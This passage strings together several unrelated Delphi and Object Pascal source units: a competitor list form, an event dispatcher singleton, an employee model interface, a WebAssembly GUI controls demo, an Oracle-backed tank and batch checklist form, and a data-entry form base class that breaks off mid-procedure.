ShowDialogForm(TfrmDialogDaftarKompetitor, CDS.FieldByName('KOMPETITOR_ID').AsString); end; procedure TfrmDaftarCompetitor.FormDestroy(Sender: TObject); begin inherited; frmDaftarCompetitor := nil; end; procedure TfrmDaftarCompetitor.RefreshData; begin inherited; if Assigned(FCDS) then FreeAndNil(FCDS); FCDS := TDBUtils.DSToCDS(DMClient.DSProviderClient.Kompetitor_GetDSOverview ,Self ); cxGridView.LoadFromCDS(CDS); cxGridView.SetVisibleColumns(['KOMPETITOR_ID'],False); end; end.
unit NewFrontiers.Events; interface uses Generics.Collections; type IEvent = interface end; TEvent = class(TInterfacedObject, IEvent) protected _propagationStopped: boolean; public property PropagationStopped: boolean read _propagationStopped; end; IEventListener = interface function onEvent(aEvent: TEvent): boolean; end; TEventDispatcher = class protected _listeners: TObjectDictionary<string, TList<IEventListener>>; constructor Create; public destructor Destroy; override; /// <summary> /// Singleton-Pattern /// </summary> class function getInstance(): TEventDispatcher; /// <summary> /// Adds an event listener that listens on the specified events /// </summary> /// <param name="aPrio"> /// The higher this value, the earlier an event * listener will be /// triggered in the chain (defaults to 0) /// </param> procedure addListener(aEventName: string; aListener: IEventListener; aPrio: integer = 0); /// <summary> /// Removes an event listener from the specified events. /// </summary> procedure removeListener(aEventName: string; aListener: IEventListener); /// <summary> /// Gets the listeners of a specific event or all listeners. /// </summary> function getListeners(aEventName: string): TList<IEventListener>; /// <summary> /// Checks whether an event has any registered listeners. /// </summary> function hasListeners(aEventName: string): boolean; /// <summary> /// Dispatches an event to all registered listeners. /// </summary> /// <param name="aEventName"> /// The name of the event to dispatch. The name of * the event is the /// name of the method that is * invoked on listeners. /// </param> /// <param name="aEvent"> /// The event to pass to the event handlers/listeners. * If not /// supplied, an empty Event instance is created. /// </param> function dispatchEvent(aEventName: string; aEvent: TEvent = nil): TEvent; end; implementation var _instance: TEventDispatcher; { TEventDispatcher } procedure TEventDispatcher.addListener(aEventName: string; aListener: IEventListener; aPrio: integer); var newListenerList: TList<IEventListener>; begin // TODO: aPrio not supported at the moment if (not _listeners.ContainsKey(aEventName)) then begin newListenerList := TList<IEventListener>.Create(); _listeners.Add(aEventName, newListenerList); end; _listeners[aEventName].Add(aListener); end; constructor TEventDispatcher.Create; begin _listeners := TObjectDictionary<string, TList<IEventListener>>.Create(); end; destructor TEventDispatcher.Destroy; begin inherited; _listeners.Free; end; function TEventDispatcher.dispatchEvent(aEventName: string; aEvent: TEvent = nil): TEvent; var eventListener: IEventListener; begin if (aEvent = nil) then aEvent := TEvent.Create; result := aEvent; if (not _listeners.ContainsKey(aEventName)) then exit; for eventListener in getListeners(aEventName) do begin eventListener.onEvent(aEvent); if (aEvent.PropagationStopped) then Break; end; end; class function TEventDispatcher.getInstance: TEventDispatcher; begin if (_instance = nil) then begin _instance := TEventDispatcher.Create; end; result := _instance; end; function TEventDispatcher.getListeners( aEventName: string): TList<IEventListener>; begin result := _listeners[aEventName]; end; function TEventDispatcher.hasListeners(aEventName: string): boolean; begin result := (getListeners(aEventName) <> nil) and (getListeners(aEventName).Count > 0); end; procedure TEventDispatcher.removeListener(aEventName: string; aListener: IEventListener); begin getListeners(aEventName).Remove(aListener); end; end.
unit InterfaceFuncionarioModel; interface type IFuncionarioModel = interface(IInterface) ['{F24F26C1-9B71-4281-AC95-7841FA65CE2F}'] function GetNome(): String; stdcall; function GetSalarioBase(): Double; stdcall; function GetAliquotaComissao(): Double; stdcall; function CalcularSalario(const pFaturamentoMes: Double): Double; stdcall; property Nome: String read GetNome; property SalarioBase: Double read GetSalarioBase; property AliquotaComissao: Double read GetAliquotaComissao; end; implementation end.
namespace Basic_WebAssembly_GUI_Controls_App; uses RemObjects.Elements.RTL.Delphi, RemObjects.Elements.RTL.Delphi.VCL; type [Export] Program = public class private fProgress: TProgressBar; public method HelloWorld; begin CreateComponents; end; method CreateComponents; begin Application := new TApplication(nil); Application.Initialize; Application.Run; var el := Browser.GetElementById('helloWorld'); var lForm := new TForm(nil); lForm.Width := 800; // el it's a div element in html file, we are using as container for our form lForm.Show(el); var lFontsPanel := new TPanel(lForm); lFontsPanel.Height := 150; lFontsPanel.Width := 800; lFontsPanel.Parent := lForm; var lFontsCombo := new TComboBox(lForm); lFontsCombo.Left := 30; lFontsCombo.Top := 50; lFontsCombo.Width := 130; // Add combo inside TPanel lFontsCombo.Parent := lFontsPanel; lFontsCombo.Items.Add('Arial'); lFontsCombo.Items.Add('Verdana'); lFontsCombo.Items.Add('Helvetica'); lFontsCombo.Items.Add('Times'); var lFontSize := new TComboBox(lForm); lFontSize.Left := 200; lFontSize.Top := 50; lFontSize.Width := 80; lFontSize.Parent := lFontsPanel; for i: Integer := 8 to 72 step 4 do lFontSize.Items.Add(i.ToString()); var lLabel := new TLabel(lForm); lLabel.Left := 320; lLabel.Top := 50; lLabel.Caption := 'Choose font name and size!'; lLabel.Parent := lFontsPanel; // Assign combo events lFontsCombo.OnSelect := (a)-> begin lLabel.Font.Name := lFontsCombo.Text; end; lFontSize.OnSelect := (a)-> begin lLabel.Font.Size := StrToInt(lFontSize.Text) end; var lSecondPanel := new TPanel(lForm); lSecondPanel.Top := 220; lSecondPanel.Height := 150; lSecondPanel.Width := 800; lSecondPanel.Parent := lForm; var lCheckBox := new TCheckBox(lForm); lCheckBox.Top := 20; lCheckBox.Left := 30; lCheckBox.Caption := 'CheckBox control'; lCheckBox.Parent := lSecondPanel; var lRadioButton := new TRadioButton(lForm); lRadioButton.Top := 80; lRadioButton.Left := 30; lRadioButton.Caption := 'RadioButton control'; lRadioButton.Parent := lSecondPanel; var lChangeButton := new TButton(lForm); lChangeButton.Left := 220; lChangeButton.Top := 20; lChangeButton.Caption := 'Change progress bar mode'; lChangeButton.Parent := lSecondPanel; lChangeButton.OnClick := @ChangeButtonClick; var lIncButton := new TButton(lForm); lIncButton.Left := 220; lIncButton.Top := 80; lIncButton.Caption := 'Increase progress bar value'; lIncButton.Parent := lSecondPanel; lIncButton.OnClick := (a) -> begin fProgress.Position := fProgress.Position + 5; if fProgress.Position >= fProgress.Max then fProgress.Position := 0; end; fProgress := new TProgressBar(lForm); fProgress.Top := 55; fProgress.Left := 420; fProgress.Max := 100; fProgress.Parent := lSecondPanel; end; method ChangeButtonClick(Sender: TObject); begin if fProgress.Style = TProgressBarStyle.Marquee then fProgress.Style := TProgressBarStyle.Normal else fProgress.Style := TProgressBarStyle.Marquee; end; end; end.
unit CheckList; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, uCommonForm, StdCtrls, Buttons, ExtCtrls, Grids, DBGridEh, Db, DBTables, MemTable, MemDS, DBAccess, Ora, Math, uOilQuery; type TCheckListForm = class(TCommonForm) Panel2: TPanel; Panel3: TPanel; bbOk: TBitBtn; bbCancel: TBitBtn; Panel1: TPanel; db: TDBGridEh; Label1: TLabel; edSearch: TEdit; sbClearSearch: TSpeedButton; ds: TDataSource; sbCheckAll: TSpeedButton; SpeedButton4: TSpeedButton; q: TOilQuery; qPartRashPvl: TOilQuery; qTank: TOilQuery; procedure sbCheckAllClick(Sender: TObject); procedure qFilterRecord(DataSet: TDataSet; var Accept: Boolean); procedure edSearchChange(Sender: TObject); procedure sbClearSearchClick(Sender: TObject); procedure Init( p_Caption,p_Sql,p_MainField,p_Invisible,p_ColCaptions: string; p_FilterList: string = ''); private { Private declarations } MAIN_FIELD: string; FILTER_LIST: string; public { Public declarations } end; var CheckListForm: TCheckListForm; procedure ChooseTankList( p_Date: TDateTime; p_ZrId,p_ZrInst,p_NpType: integer; p_GtdId,p_GtdInst: integer; p_FilterList: string; pp_MT: TMemoryTable); procedure ChoosePartRashPvlList( p_Date: TDateTime; p_FromId,p_FromInst: integer; p_ToId,p_ToInst: integer; p_NpType: integer; pp_MT: TMemoryTable); implementation {$R *.DFM} uses uStart,UDbFunc, ExFunc; { TCheckListForm } //============================================================================== procedure TCheckListForm.Init( p_Caption,p_Sql,p_MainField,p_Invisible,p_ColCaptions: string; p_FilterList: string = ''); var i,n: integer; sl: TStringList; begin Caption:=p_Caption; MAIN_FIELD:=p_MainField; FILTER_LIST:=p_FilterList; if q.Active then q.Close; q.Sql.Text:=p_Sql; q.Prepare; if q.FieldList.Find('CHECKED')=nil then begin q.Unprepare; q.Sql.Text:='select 1 as checked, q.* from ('+p_Sql+') q'; q.Prepare; end; _OpenQueryOra(q); db.Columns[0].Checkboxes:=true; db.Columns[0].Width:=20; db.Columns[0].Title.Caption:=' '; db.Columns[0].KeyList.Add('1'); db.Columns[0].KeyList.Add('0'); for i:=1 to db.Columns.Count-1 do db.Columns[i].Visible:=pos(','+db.Columns[i].FieldName+',',','+UpperCase(p_Invisible)+',')=0; sl:=TStringList.Create; Str2StringList(p_Colcaptions,sl); n:=0; for i:=1 to db.Columns.Count-1 do begin if n>=sl.Count then break; if db.Columns[i].Visible then begin db.Columns[i].Title.Caption:=sl[n]; inc(n); end; end; sl.Free; for i:=1 to q.Fields.Count-1 do q.Fields[i].ReadOnly:=true; if (MAIN_FIELD<>'') and (FILTER_LIST<>'') then q.Filtered:=true; end; //============================================================================== procedure TCheckListForm.sbCheckAllClick(Sender: TObject); var bm: string; begin bm:=q.Bookmark; q.DisableControls; q.First; while not q.Eof do begin q.Edit; q.FieldByName('checked').Value:=(Sender as TSpeedButton).Tag; q.Post; q.Next; end; q.EnableControls; q.Bookmark:=bm; end; //============================================================================== procedure TCheckListForm.qFilterRecord(DataSet: TDataSet; var Accept: Boolean); begin inherited; if (MAIN_FIELD<>'') and (FILTER_LIST<>'') then Accept:=pos(','+q.FieldByName(MAIN_FIELD).AsString+',',','+FILTER_LIST+',')=0 else Accept:=true; end; //============================================================================== procedure TCheckListForm.edSearchChange(Sender: TObject); begin if edSearch.Text='' then exit; q.DisableControls; q.First; while not q.Eof and (q.FieldByName(MAIN_FIELD).AsString<edSearch.Text) do q.Next; if copy(q.FieldByName(MAIN_FIELD).AsString,1,length(edSearch.Text))=edSearch.Text then edSearch.Font.Color:=clBlack else edSearch.Font.Color:=clRed; q.EnableControls; end; //============================================================================== procedure TCheckListForm.sbClearSearchClick(Sender: TObject); begin inherited; edSearch.Clear; end; //============================================================================== procedure ChooseTankList( p_Date: TDateTime; p_ZrId,p_ZrInst,p_NpType: integer; p_GtdId,p_GtdInst: integer; p_FilterList: string; pp_MT: TMemoryTable); var F: TCheckListForm; sql: string; begin F:=TCheckListForm.Create(Application); DefineQParamsOra(F.qTank, ['date_', p_Date, 'zr_id', p_ZrId, 'zr_inst', p_ZrInst, 'np_type', p_NpType, 'gtd_id', p_GtdId, 'gtd_inst', p_GtdInst]); sql:=FullSqlTextOra(F.qTank); F.Init(TranslateText('Цистерны'),sql,'tank_num', 'ID,INST,STATE,ZR_ID,ZR_INST,TANK_TYPE,DENSITY,TEMPERATURE,DATE_MOD,TANK_TYPE_NAME,NP_TYPE_NAME,NP_GRP,NP_GRP_NAME,RNUM', TranslateText('№ цистерны,ЖД накладная,Тип НП,НП брутто,Вода тонн'), p_FilterList); F.db.FooterRowCount:=1; F.db.sumlist.Active:=true; F.db.Columns[1].Footer.Value:=TranslateText('Итого'); F.db.Columns[1].Footer.ValueType:=fvtStaticText; F.db.Columns[2].Footer.ValueType:=fvtCount; F.db.Columns[4].Footer.DisplayFormat:='0.000'; F.db.Columns[4].Footer.FieldName:='FULL_COUNT'; F.db.Columns[4].Footer.ValueType:=fvtSum; F.db.Columns[5].Footer.DisplayFormat:='0.000'; F.db.Columns[5].Footer.FieldName:='WATER_COUNT'; F.db.Columns[5].Footer.ValueType:=fvtSum; if F.ShowModal=mrOk then begin CopyToMemoryTable(F.q,pp_MT, 'tank_num,tank_type,zd_nakl,density,temperature,'+ 'full_count:zavod_count,full_count,water_count,level_mm,pv,tank_type_name,np_type_name,np_type,'+ 'zrd_id,zrd_inst', 'checked','1',false); end; F.Free; end; //============================================================================== procedure ChoosePartRashPvlList( p_Date: TDateTime; p_FromId,p_FromInst: integer; p_ToId,p_ToInst: integer; p_NpType: integer; pp_MT: TMemoryTable); var F: TCheckListForm; sql: string; begin F:=TCheckListForm.Create(Application); DefineQParamsOra(F.qPartRashPvl, ['date_', p_Date, 'np_type', p_NpType, 'part_from_id', p_FromId, 'part_from_inst', p_FromInst, 'part_to_id', p_ToId, 'part_to_inst', p_ToInst]); sql:=FullSqlTextOra(F.qPartRashPvl); F.Init(TranslateText('Партии'),sql,'part_name', 'PART_ID,PART_INST,GTD_ID,GTD_INST', TranslateText('Партия,№ ГТД,Тонн (брутто),Остаток (брутто)'), ''); F.db.FooterRowCount:=1; F.db.sumlist.Active:=true; F.db.Columns[1].Width:=60; F.db.Columns[2].Width:=120; F.db.Columns[1].Footer.Value:=TranslateText('Итого'); F.db.Columns[1].Footer.ValueType:=fvtStaticText; F.db.Columns[3].Footer.DisplayFormat:='0.000'; F.db.Columns[3].Footer.FieldName:='REST_FULL_TONN'; F.db.Columns[3].Footer.ValueType:=fvtSum; if F.ShowModal=mrOk then begin CopyToMemoryTable(F.q,pp_MT, 'part_id,part_inst,part_name,gtd_id,gtd_inst,gtd_num,full_count:pr_real_tonn,rest_full_tonn:pr_tonn', 'checked','1',false); end; F.Free; end; //============================================================================== end.
unit uParentCustomFch; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, uParentForm, mrConfigFch, uNTDataSetControl, uNTUpdateControl, DBClient, uSystemTypes, DB, StdCtrls, ExtCtrls, uMRSQLParam, uNTTraceControl, XiButton, uUserObj; type TParentCustomFch = class(TParentForm) dsFch: TDataSource; pnlTitulo: TPanel; PrintFch: TPrintDialog; ConfigFch: TmrConfigFch; btnLoop: TXiButton; lbLoop: TLabel; procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean); procedure OnFirstClick(Sender: TObject); procedure OnPriorClick(Sender: TObject); procedure OnNextClick(Sender: TObject); procedure OnLastClick(Sender: TObject); procedure OnPrintClick(Sender: TObject); procedure OnLoopClick(Sender: TObject); procedure dsFchStateChange(Sender: TObject); private FDataSet: TClientDataSet; FParams: String; FActionType: TActionType; FTransaction: TmrTransaction; FOwnerTransaction: Boolean; FSession: TmrSession; FTraceControl: TmrTraceControl; FDataSetControl: TmrDataSetControl; FUpdateControl: TmrUpdateControl; FOwnerSession: Boolean; FInInsertLoop: Boolean; FOnGetTransaction: TOnGetTransaction; FOnGetForeignKeyValue: TOnGetForeignKeyValue; FOnLastRecord: TNotifyEvent; FOnPriorRecord: TNotifyEvent; FOnFirstRecord: TNotifyEvent; FOnNextRecord: TNotifyEvent; FOnCanNextRecord: TOnCanNavigate; FOnCanPriorRecord: TOnCanNavigate; FKeyFieldName : String; procedure ConfigAppend; procedure ConfigEdit; procedure ConfigBrowse; procedure UpdateNavigation; procedure UpdateButtons; procedure CancelChanges; procedure SetTransaction; procedure SetDefaultFieldsValues; procedure SetFieldValue(aFieldName: String; aValue: Variant); procedure GetIdentityField; procedure SetIdentityField; procedure SetCodeField; procedure SetForeignField; function GetForeignFieldName: String; function GetKeyFieldName: String; function TestBeforeNavigation: Integer; function TestFieldFill: Boolean; function TesteFieldsFill(sFields: String): Boolean; function TestUniqueFields: Boolean; function FormRestricted : Boolean; protected FSystemUser : TUser; procedure ConfigButtons(aActionType: TActionType); virtual; abstract; procedure ConfigNavigation(aCanPrior, aCanNext: Boolean); virtual; abstract; procedure SetPageControl(PageIndex: Integer); virtual; abstract; procedure RestrictForm; virtual; public destructor Destroy; override; procedure Init(ATraceControl: TmrTraceControl; ADataSetControl: TmrDataSetControl; AUpdateControl: TmrUpdateControl; ASession: TmrSession; ADataSet: TClientDataSet; ASystemUser : TUser; AParams: String = ''); function ShowFch: Boolean; function ApplyChanges: Boolean; function GetKeyFieldValue: String; procedure Append(AParams: String = ''); procedure Open(AParams: String = ''); property KeyFieldName: String read GetKeyFieldName; property ForeignFieldName: String read GetForeignFieldName; property DataSet: TClientDataSet read FDataSet write FDataSet; property ActionType: TActionType read FActionType write FActionType; property Params: String read FParams write FParams; property Session: TmrSession read FSession write FSession; property TraceControl: TmrTraceControl read FTraceControl; property DataSetControl: TmrDataSetControl read FDataSetControl; property UpdateControl: TmrUpdateControl read FUpdateControl; property OwnerSession: Boolean read FOwnerSession write FOwnerSession; property Transaction: TmrTransaction read FTransaction write FTransaction; property OwnerTransaction: Boolean read FOwnerTransaction write FOwnerTransaction; property OnFirstRecord: TNotifyEvent read FOnFirstRecord write FOnFirstRecord; property OnPriorRecord: TNotifyEvent read FOnPriorRecord write FOnPriorRecord; property OnNextRecord: TNotifyEvent read FOnNextRecord write FOnNextRecord; property OnLastRecord: TNotifyEvent read FOnLastRecord write FOnLastRecord; property OnCanPriorRecord: TOnCanNavigate read FOnCanPriorRecord write FOnCanPriorRecord; property OnCanNextRecord: TOnCanNavigate read FOnCanNextRecord write FOnCanNextRecord; property OnGetTransaction: TOnGetTransaction read FOnGetTransaction write FOnGetTransaction; property OnGetForeignKeyValue: TOnGetForeignKeyValue read FOnGetForeignKeyValue write FOnGetForeignKeyValue; end; implementation uses uNTFieldFunctions, mrMsgBox, uMRParam, uParamFunctions; {$R *.dfm} { TParentCustomFch } procedure TParentCustomFch.ConfigEdit; begin FTraceControl.TraceIn('TParentCustomFch.ConfigEdit'); ActionType := atEdit; if Assigned(ConfigFch.OnBeforeEdit) then ConfigFch.OnBeforeEdit(Self); SetTransaction; UpdateButtons; if Assigned(ConfigFch.OnAfterEdit) then ConfigFch.OnAfterEdit(Self); FTraceControl.TraceOut; end; procedure TParentCustomFch.ConfigAppend; begin FTraceControl.TraceIn('TParentCustomFch.ConfigAppend'); ActionType := atAppend; if Assigned(ConfigFch.OnBeforeAppend) then ConfigFch.OnBeforeAppend(Self); SetTransaction; SetDefaultFieldsValues; UpdateButtons; if Assigned(ConfigFch.OnAfterAppend) then ConfigFch.OnAfterAppend(Self); FTraceControl.TraceOut; end; procedure TParentCustomFch.ConfigBrowse; begin FTraceControl.TraceIn('TParentCustomFch.ConfigBrowse'); ActionType := atBrowse; if Assigned(ConfigFch.OnBeforeBrowse) then ConfigFch.OnBeforeBrowse(Self); UpdateButtons; if Assigned(ConfigFch.OnAfterBrowse) then ConfigFch.OnAfterBrowse(Self); FTraceControl.TraceOut; end; destructor TParentCustomFch.Destroy; begin FTraceControl.TraceIn('TParentCustomFch.Destroy'); if OwnerSession then Session.Terminate; inherited Destroy; FTraceControl.TraceOut; end; procedure TParentCustomFch.dsFchStateChange(Sender: TObject); begin FTraceControl.TraceIn('TParentCustomFch.Destroy'); try if dsFch.State in [dsInsert] then ConfigAppend else if dsFch.State in [dsEdit] then ConfigEdit else ConfigBrowse; FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; procedure TParentCustomFch.Init(ATraceControl: TmrTraceControl; ADataSetControl: TmrDataSetControl; AUpdateControl: TmrUpdateControl; ASession: TmrSession; ADataSet: TClientDataSet; ASystemUser : TUser; AParams: String = ''); begin FInInsertLoop := False; FTraceControl := ATraceControl; FDataSetControl := ADataSetControl; FUpdateControl := AUpdateControl; FSystemUser := ASystemUser; FTraceControl.TraceIn('TParentCustomFch.Init'); try Params := AParams; Self.Caption := ParseParam(Params, 'MenuDisplay'); ConfigFch.DoBeforeStart; OwnerSession := ASession = nil; if OwnerSession then Session := FDataSetControl.CreateSession else Session := ASession; if ADataSet = nil then DataSet := Session.CreateDataSet(ConfigFch.Connection, ConfigFch.ProviderName) else DataSet := ADataSet; dsFch.DataSet := DataSet; dsFch.OnStateChange := dsFchStateChange; //Seto PacketRecords=0 para abrir o sem dar o fetch. //E preciso carregar os fields (MetaData) para configurar a grid. //Depois e preciso setar a PacketRecords=-1 para abrir dando o fetch. if not DataSet.Active then try DataSet.PacketRecords := 0; DataSet.Open; finally DataSet.PacketRecords := -1; end; FKeyFieldName := DataSet.GetOptionalParam('IdentityField'); if FormRestricted then RestrictForm; ConfigFch.DoAfterStart; FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; procedure TParentCustomFch.SetTransaction; var ATransaction: TmrTransaction; begin FTraceControl.TraceIn('TParentCustomFch.SetTransaction'); ATransaction := nil; if Assigned(FOnGetTransaction) then OnGetTransaction(Self, ATransaction); OwnerTransaction := ATransaction = nil; if OwnerTransaction then ATransaction := FUpdateControl.CreateTransaction; Transaction := ATransaction; FTraceControl.TraceOut; end; procedure TParentCustomFch.SetDefaultFieldsValues; var Field, Fields: String; Value: Variant; begin FTraceControl.TraceIn('TParentCustomFch.SetDefaultFieldsValues'); // Pega informações passadas pelo servidor através do evento // BeforeGetParam do DataSetProvider Fields := DataSet.GetOptionalParam('FieldsDefaultValues'); while Fields <> '' do begin GetParamDefaultValue(Fields, Field, Value); SetFieldValue(Field, Value); end; SetIdentityField; SetCodeField; SetForeignField; FTraceControl.TraceOut; end; procedure TParentCustomFch.SetFieldValue(aFieldName: String; aValue: Variant); var fField: TField; begin FTraceControl.TraceIn('TParentCustomFch.SetFieldValue'); fField := DataSet.FindField(aFieldName); if fField <> nil then begin if (fField is TDateTimeField) or (fField is TSQLTimeStampField) then TDateTimeField(fField).AsDateTime := aValue else if fField is TBooleanField then TBooleanField(fField).AsBoolean := aValue else fField.Value := aValue; end; FTraceControl.TraceOut; end; function TParentCustomFch.GetForeignFieldName: String; begin Result := DataSet.GetOptionalParam('ForeignField'); end; procedure TParentCustomFch.SetForeignField; var ForeignKeyValue: TMRSQLParam; begin FTraceControl.TraceIn('TParentCustomFch.SetForeignField'); if DataSet.GetOptionalParam('ForeignField') <> '' then try ForeignKeyValue := TMRSQLParam.Create; if Assigned(FOnGetForeignKeyValue) then begin OnGetForeignKeyValue(Self, ForeignKeyValue); DataSet.FieldByName(DataSet.GetOptionalParam('ForeignField')).Value := ForeignKeyValue.KeyByName(DataSet.GetOptionalParam('ForeignField')).AsString; end; finally ForeignKeyValue.Free; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.SetCodeField; begin FTraceControl.TraceIn('TParentCustomFch.SetCodeField'); if DataSet.GetOptionalParam('AutoGenerateCode') then DataSet.FieldByName(DataSet.GetOptionalParam('CodeField')).Value := FDataSetControl.Connection.AppServer.GetNextCode( DataSet.GetOptionalParam('TableName'), DataSet.GetOptionalParam('CodeField')); FTraceControl.TraceOut; end; procedure TParentCustomFch.SetIdentityField; begin FTraceControl.TraceIn('TParentCustomFch.SetIdentityField'); if DataSet.GetOptionalParam('AutoGenerateIdentity') then GetIdentityField; FTraceControl.TraceOut; end; procedure TParentCustomFch.GetIdentityField; begin FTraceControl.TraceIn('TParentCustomFch.GetIdentityField'); if GetKeyFieldName <> '' then DataSet.FieldByName(GetKeyFieldName).Value := FDataSetControl.Connection.AppServer.GetNextCode( DataSet.GetOptionalParam('TableName'), GetKeyFieldName); FTraceControl.TraceOut; end; function TParentCustomFch.GetKeyFieldName: String; begin Result := FKeyFieldName; end; function TParentCustomFch.GetKeyFieldValue: String; var i: Integer; begin FTraceControl.TraceIn('TParentCustomFch.GetKeyFieldValue'); try for i := 0 to DataSet.Fields.Count-1 do if pfInKey in DataSet.Fields[i].ProviderFlags then begin Result := DataSet.Fields[i].AsString; Break; end; FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; function TParentCustomFch.ShowFch: Boolean; var TabIndex: Integer; begin Result := False; FTraceControl.TraceIn('TParentCustomFch.ShowFch'); try TabIndex := 0; ConfigFch.DoActiveTab(TabIndex); SetPageControl(TabIndex); UpdateNavigation; Result := (ShowModal = mrOk); FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; procedure TParentCustomFch.Open(AParams: String); begin FTraceControl.TraceIn('TParentCustomFch.Open'); try Params := AParams; ConfigBrowse; FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; procedure TParentCustomFch.Append(AParams: String); begin FTraceControl.TraceIn('TParentCustomFch.Append'); try Params := AParams; DataSet.Append; FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; function TParentCustomFch.ApplyChanges: Boolean; begin FTraceControl.TraceIn('TParentCustomFch.ApplyChanges'); Result := False; try if (GetKeyFieldName <> '') and (DataSet.FieldByName(GetKeyFieldName).Value = null) then GetIdentityField; DataSet.UpdateRecord; if TestFieldFill and TestUniqueFields and ConfigFch.DoBeforeApplyChanges then begin DataSet.CheckBrowseMode; Transaction.PostUpdate(DataSet); if OwnerTransaction then begin ConfigFch.DoBeforeCommitTransaction; if Transaction.CommitTransaction then begin Transaction := nil; OwnerTransaction := False; Result := True; ConfigFch.DoAfterApplyChanges; DataSet.Refresh; ConfigFch.DoAfterNavigation; end else raise Exception.Create('Transaction.CommitTransaction error'); end else Result := True; end; FTraceControl.TraceOut; except on E: Exception do FTraceControl.SaveTrace(FSystemUser.ID, E.Message, Self.ClassName); end; end; function TParentCustomFch.TestFieldFill: Boolean; var sFields: String; i: Integer; begin FTraceControl.TraceIn('TParentCustomFch.TestFieldFill'); sFields := ''; with dsFch.DataSet do for i := 0 to FieldCount-1 do if Fields[i].Required then begin if sFields <> '' then sFields := sFields + ';'; sFields := sFields + Fields[i].FieldName; end; Result := TesteFieldsFill(sFields); FTraceControl.TraceOut; end; function TParentCustomFch.TesteFieldsFill(sFields: String): Boolean; var i: Integer; Msg1, Msg2: String; slFields: TStringList; fField: TField; begin FTraceControl.TraceIn('TParentCustomFch.TesteFieldsFill'); Msg2 := ''; Result := True; slFields := TStringList.Create; with slFields do try Delimiter := ';'; DelimitedText := sFields; for i := 0 to Count-1 do begin fField := DataSet.FieldByName(Strings[i]); if (fField.AsString = '') and (Result) then begin Result := False; Msg1 := 'Required field [' + fField.DisplayLabel + '].'; fField.FocusControl; end; if fField.AsString = '' then begin if Msg2 <> '' then Msg2 := Msg2 + ','; Msg2 := Msg2 + fField.DisplayLabel; end; end; if not Result then MsgBox(Msg1 + '_The required fields are :' + Msg2, vbInformation + vbOKOnly); finally Free; end; FTraceControl.TraceOut; end; function TParentCustomFch.TestUniqueFields: Boolean; var sMsg, sTableName, sFieldToCompare, sValueToCompare, sField, sUniqueFields, sUniqueFieldsList: String; i: Integer; begin FTraceControl.TraceIn('TParentCustomFch.TestUniqueFields'); Result := True; sTableName := UpperCase(DataSet.GetOptionalParam('TableName')); sUniqueFieldsList := UpperCase(DataSet.GetOptionalParam('UniqueFields')); while sUniqueFieldsList <> '' do begin sFieldToCompare := ''; sValueToCompare := ''; sMsg := ''; sUniqueFields := Copy(sUniqueFieldsList, 1, Pos(';', sUniqueFieldsList)-1); sUniqueFieldsList := Copy(sUniqueFieldsList, Pos(';', sUniqueFieldsList)+1, Length(sUniqueFieldsList)); while sUniqueFields <> '' do begin if Pos(',', sUniqueFields) > 0 then begin sField := Copy(sUniqueFields, 1, Pos(',', sUniqueFields)-1); sUniqueFields := Copy(sUniqueFields, Pos(',', sUniqueFields)+1, Length(sUniqueFields)); end else begin sField := sUniqueFields; sUniqueFields := ''; end; for i := 0 to DataSet.Fields.Count-1 do if UpperCase(DataSet.Fields[i].FieldName) = sField then begin if sMsg = '' then sMsg := 'The value [' + DataSet.Fields[i].AsString + '] of the field [' + DataSet.Fields[i].DisplayLabel + '] was already used and cannot be equal.'; if sFieldToCompare <> '' then sFieldToCompare := sFieldToCompare + ','; sFieldToCompare := sFieldToCompare + DataSet.Fields[i].FieldName; if sValueToCompare <> '' then sValueToCompare := sValueToCompare + ','; sValueToCompare := sValueToCompare + DataSet.Fields[i].AsString; end; end; if (sFieldToCompare <> '') and (sValueToCompare <> '') then Result := FDataSetControl.Connection.AppServer.TestUniqueFields(sTableName, sFieldToCompare, sValueToCompare, GetKeyFieldName, GetKeyFieldValue); if not Result then begin MsgBox(sMsg, vbInformation + vbOKOnly); Exit; end; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.CancelChanges; begin FTraceControl.TraceIn('TParentCustomFch.CancelChanges'); ConfigFch.DoBeforeCancelChanges; DataSet.Cancel; if OwnerTransaction then begin Transaction.RollBackTransaction; Transaction := nil; OwnerTransaction := False; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.OnLastClick(Sender: TObject); begin FTraceControl.TraceIn('TParentCustomFch.OnLastClick'); if TestBeforeNavigation <> 0 then try OnLastRecord(Sender); UpdateNavigation; finally ConfigFch.DoAfterNavigation; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.OnLoopClick(Sender: TObject); begin FInInsertLoop := not FInInsertLoop; lbLoop.Visible := FInInsertLoop; end; procedure TParentCustomFch.OnPriorClick(Sender: TObject); begin FTraceControl.TraceIn('TParentCustomFch.OnPriorClick'); if TestBeforeNavigation <> 0 then try OnPriorRecord(Sender); UpdateNavigation; finally ConfigFch.DoAfterNavigation; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.OnPrintClick(Sender: TObject); begin if PrintFch.Execute then Print; end; procedure TParentCustomFch.OnFirstClick(Sender: TObject); begin FTraceControl.TraceIn('TParentCustomFch.OnFirstClick'); if TestBeforeNavigation <> 0 then try OnFirstRecord(Sender); UpdateNavigation; finally ConfigFch.DoAfterNavigation; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.OnNextClick(Sender: TObject); begin FTraceControl.TraceIn('TParentCustomFch.OnNextClick'); if TestBeforeNavigation <> 0 then try OnNextRecord(Sender); UpdateNavigation; finally ConfigFch.DoAfterNavigation; end; FTraceControl.TraceOut; end; procedure TParentCustomFch.FormCloseQuery(Sender: TObject; var CanClose: Boolean); begin inherited; 